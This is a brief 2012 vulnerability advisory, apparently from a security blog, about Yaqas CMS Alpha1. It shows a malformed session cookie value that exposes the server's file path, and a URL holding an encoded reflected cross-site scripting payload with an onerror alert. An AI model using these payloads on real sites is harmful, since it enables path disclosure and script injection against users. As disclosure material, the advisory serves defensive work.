# TITLE ....... # Yaqas CMS Alpha1 Information Disclosure #
# DATE ........ # 25.03.2012 #
# AUTOHR ...... # http://hauntit.blogspot.com #
# SOFT LINK ... # YAQAS - Yet Another Question & Answer System @ google #
# SOFT Copyright# "(C) 2012 Karpouzas George" * #
# VERSION ..... # Alpha1 #
# TESTED ON ... # LAMP #
# ..................................................................... #
# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is bug :)
# 4. More...
#............................................#
# 1. What is this?
This is very nice CMS, You should try it! ;)
#............................................#
# 2. What is the type of vulnerability?
# 2.1 information disclosure
If we'll send PHPSESSID = %3b)() , error information (maybe visible only in src) should be like this:
"Warning: session_start():
The session id is too long or contains illegal characters, valid characters
are a-z, A-Z, 0-9 and '-,' in /your/www/yaqas-release-alpha1/src/lib/session.php on line 32"
# 2.2 btw:
http://yaqas-release-alpha1/src/index.php?q=%29%2f*%20]]%3E%20*%2f%3Cimg%20src%3dxxx%20onerror%3dalert%28123123123123%29%3E&type=nhf
#............................................#
# 3. Where is bug :)
#............................................#
# 4. More...
- (*) from license : YAQAS - Yet Another Question & Answer System // Copyright (C) 2012 Karpouzas George
- http://www.google.com
- http://hauntit.blogspot.com
- http://portswigger.net
#............................................#
# Ask me about new projects...
#
# Best regards
#
No comments:
Post a Comment
What do You think...?